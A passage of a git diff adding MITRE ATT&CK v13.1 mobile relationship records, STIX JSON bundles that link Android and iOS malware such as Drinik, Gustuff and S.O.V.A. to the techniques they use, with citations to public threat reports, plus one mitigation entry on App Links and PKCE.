September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Developers should use Android App Links(Citation: Android App Links) and iOS Universal Links(Citation: iOS Universal Links) to provide a secure binding between URIs and applications, preventing malicious applications from intercepting redirections. Additionally, for OAuth use cases, PKCE(Citation: IETF-PKCE) should be used to prevent use of stolen authorization codes. ", + "modified": "2022-04-01T15:16:02.324Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08a43019-d393-451f-a23c-2dfa17ec40b2.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08a43019-d393-451f-a23c-2dfa17ec40b2.json new file mode 100644 index 0000000000000000000000000000000000000000..38ba9899d2cac562801dc9285526511a7b82d7db --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08a43019-d393-451f-a23c-2dfa17ec40b2.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--f089ba5f-31af-42bc-9085-c4368a4a8df2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--08a43019-d393-451f-a23c-2dfa17ec40b2", + "created": "2023-01-18T19:15:24.775Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:51:07.963Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can steal incoming SMS messages and send SMS messages from compromised devices. (Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08c81253-975c-4780-8e85-c72bc6a90c88.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08c81253-975c-4780-8e85-c72bc6a90c88.json new file mode 100644 index 0000000000000000000000000000000000000000..c0e8f6bc2c40165ac786e1f5fba9a36eb56fb782 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--08c81253-975c-4780-8e85-c72bc6a90c88.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--627c25e1-2097-465e-bf5b-140eb87ff4c4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--08c81253-975c-4780-8e85-c72bc6a90c88", + "created": "2020-10-29T19:21:23.225Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) can generate revenue by automatically displaying ads.(Citation: WeLiveSecurity AdDisplayAshas)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0972d3cf-717e-4ed2-a89d-9cbe61081956.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0972d3cf-717e-4ed2-a89d-9cbe61081956.json new file mode 100644 index 0000000000000000000000000000000000000000..2d3b445a689337ecdd32f2fb62730aadc97130db --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0972d3cf-717e-4ed2-a89d-9cbe61081956.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1ef208d0-2ddd-42d8-9ea0-f313f3272e52", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0972d3cf-717e-4ed2-a89d-9cbe61081956", + "created": "2020-11-24T17:55:12.873Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:21:56.899Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) has communicated with the C2 using HTTP requests or WebSockets as a backup.(Citation: Talos GPlayed) ", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0993769f-63fb-4720-bbcf-e6f37f71515e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0993769f-63fb-4720-bbcf-e6f37f71515e.json new file mode 100644 index 0000000000000000000000000000000000000000..950c158a0c6bc2a1f6840fb2a9acc1fa07fbeb93 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0993769f-63fb-4720-bbcf-e6f37f71515e.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b2103a07-4a8a-4b15-9de4-8df32c9cba03", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0993769f-63fb-4720-bbcf-e6f37f71515e", + "type": "relationship", + "created": "2020-06-02T14:32:31.875Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.875Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can collect the device\u2019s name, serial number, iOS version, total disk space, and free disk space.(Citation: Google Project Zero Insomnia) ", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c55c29-ce4f-4d3e-a940-f3a4b6f07bca.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c55c29-ce4f-4d3e-a940-f3a4b6f07bca.json new file mode 100644 index 0000000000000000000000000000000000000000..c688d848083d3c180ccdddafaca79aae8a040422 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c55c29-ce4f-4d3e-a940-f3a4b6f07bca.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--af2b0e75-97ff-423c-8a2b-42a38e6bf492", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--09c55c29-ce4f-4d3e-a940-f3a4b6f07bca", + "created": "2022-04-06T13:22:57.754Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:22:57.754Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "target_ref": "attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c6bbd4-9058-4657-9d8e-656439637ac6.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c6bbd4-9058-4657-9d8e-656439637ac6.json new file mode 100644 index 0000000000000000000000000000000000000000..3a7283806d08be4091f3a33fb862b7ad7b9a270b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09c6bbd4-9058-4657-9d8e-656439637ac6.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--68170f1a-5445-441b-839f-bb42baf161b6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--09c6bbd4-9058-4657-9d8e-656439637ac6", + "created": "2023-03-16T18:32:47.895Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:32:47.895Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09d08f16-9e4d-4279-9a8c-bdda7afdb37d.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09d08f16-9e4d-4279-9a8c-bdda7afdb37d.json new file mode 100644 index 0000000000000000000000000000000000000000..0958acd182eaaa332c7c28a78ffb38fed95f9083 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--09d08f16-9e4d-4279-9a8c-bdda7afdb37d.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--3a4cbbf6-addd-47a0-a686-2f6821184a92", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--09d08f16-9e4d-4279-9a8c-bdda7afdb37d", + "created": "2023-02-06T19:01:08.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:07:32.636Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) has encoded files, such as exploit binaries, to potentially use during and after the rooting process.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a28b2f2-ca0e-4d9f-9840-26e8ce944012.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a28b2f2-ca0e-4d9f-9840-26e8ce944012.json new file mode 100644 index 0000000000000000000000000000000000000000..5d681390590194636a56253b70d8d328e530a9e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a28b2f2-ca0e-4d9f-9840-26e8ce944012.json @@ -0,0 +1,22 @@ +{ + "type": "bundle", + "id": "bundle--9cc206dc-293e-46b2-b25f-a8ab307c717c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a28b2f2-ca0e-4d9f-9840-26e8ce944012", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a2e4b01-e78f-4c05-b157-c6714d34fddb.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a2e4b01-e78f-4c05-b157-c6714d34fddb.json new file mode 100644 index 0000000000000000000000000000000000000000..756e07134fa34f5900e9a06ef5f500affde08026 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a2e4b01-e78f-4c05-b157-c6714d34fddb.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--c2dbd03b-c809-4654-8ed4-c53cb81ff869", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a2e4b01-e78f-4c05-b157-c6714d34fddb", + "type": "relationship", + "created": "2020-12-18T20:14:47.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.412Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has included native modules.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a610208-06af-425f-a9af-cd0899261e33.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a610208-06af-425f-a9af-cd0899261e33.json new file mode 100644 index 0000000000000000000000000000000000000000..319f2d4ffdabbb3fb4c6d3d288a926f2cdcad780 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a610208-06af-425f-a9af-cd0899261e33.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--143575da-d92d-4a7f-bb7d-aea23b1a502c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a610208-06af-425f-a9af-cd0899261e33", + "type": "relationship", + "created": "2020-09-11T15:45:38.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:45:38.450Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can send SMS messages.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a737289-c62d-4c0a-a857-6d116f774864.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a737289-c62d-4c0a-a857-6d116f774864.json new file mode 100644 index 0000000000000000000000000000000000000000..794f9ee0fa53f1bdc6400ac1c734e7a8bf544523 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a737289-c62d-4c0a-a857-6d116f774864.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--af395967-47dd-4edd-bc2c-3b6f81765a3c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a737289-c62d-4c0a-a857-6d116f774864", + "type": "relationship", + "created": "2020-06-26T15:12:40.077Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:12:40.077Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) can abuse the accessibility service to read any text displayed on the screen.(Citation: ESET DEFENSOR ID)", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1aae4b-4dcd-41b6-a708-1441e5a24070.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1aae4b-4dcd-41b6-a708-1441e5a24070.json new file mode 100644 index 0000000000000000000000000000000000000000..5163a43be9580e8a9b7ea6f2a223cc8fd9d954c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1aae4b-4dcd-41b6-a708-1441e5a24070.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--c78528f8-0ab7-4ff6-a1af-0de4ad302bb9", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0b1aae4b-4dcd-41b6-a708-1441e5a24070", + "created": "2022-04-15T17:18:44.185Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) obfuscated command information using a custom base85-based encoding.(Citation: Talos Gustuff Apr 2019)", + "modified": "2022-04-15T17:18:44.185Z", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1e5e78-9ee1-4fc3-9fe7-dc069b59e77d.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1e5e78-9ee1-4fc3-9fe7-dc069b59e77d.json new file mode 100644 index 0000000000000000000000000000000000000000..264add20e392aba206fd103118e15f1b3e52081a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1e5e78-9ee1-4fc3-9fe7-dc069b59e77d.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ca3f8c50-f095-4118-9aea-8acfec6a0048", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0b1e5e78-9ee1-4fc3-9fe7-dc069b59e77d", + "created": "2020-05-04T14:04:56.179Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Bread](https://attack.mitre.org/software/S0432) payloads have used several commercially available packers.(Citation: Google Bread)", + "modified": "2022-04-15T17:20:54.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1f2735-97d9-4f4a-9967-9fa1464bb651.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1f2735-97d9-4f4a-9967-9fa1464bb651.json new file mode 100644 index 0000000000000000000000000000000000000000..ff50f4ccc40d9f2d2af50222fd43ed3109637238 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1f2735-97d9-4f4a-9967-9fa1464bb651.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--4049c77a-33e9-4892-9e0d-27b409b371aa", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0b1f2735-97d9-4f4a-9967-9fa1464bb651", + "created": "2023-04-11T19:54:52.711Z", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T19:54:52.711Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can programmatically tap the screen or swipe.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b531974-1a28-4f16-ba34-1f7c8371b6b2.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b531974-1a28-4f16-ba34-1f7c8371b6b2.json new file mode 100644 index 0000000000000000000000000000000000000000..0781c0fed446862fc696715a6192c067cb758232 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b531974-1a28-4f16-ba34-1f7c8371b6b2.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--f1ce5813-cf64-4c8d-b8a2-27ae0aa50841", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0b531974-1a28-4f16-ba34-1f7c8371b6b2", + "created": "2023-03-20T15:28:54.837Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:28:54.837Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b5bfa77-51b4-41b4-ae03-88b585d143c1.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b5bfa77-51b4-41b4-ae03-88b585d143c1.json new file mode 100644 index 0000000000000000000000000000000000000000..085fc10559e78703395a7c175686adbc845f0915 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b5bfa77-51b4-41b4-ae03-88b585d143c1.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--c66e6a5f-7bb1-4744-9f46-0d4ba413b916", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0b5bfa77-51b4-41b4-ae03-88b585d143c1", + "type": "relationship", + "created": "2020-09-11T14:54:16.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.650Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) has been distributed in multiple stages.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b693e45-cc20-45a9-846f-2f5f4d3a3253.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b693e45-cc20-45a9-846f-2f5f4d3a3253.json new file mode 100644 index 0000000000000000000000000000000000000000..68e980259216af37cee075b9b8824beab9edb92c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b693e45-cc20-45a9-846f-2f5f4d3a3253.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--25a8fe1c-dde3-4983-bd98-5bae1e93ba1c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0b693e45-cc20-45a9-846f-2f5f4d3a3253", + "type": "relationship", + "created": "2020-12-31T18:25:05.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": 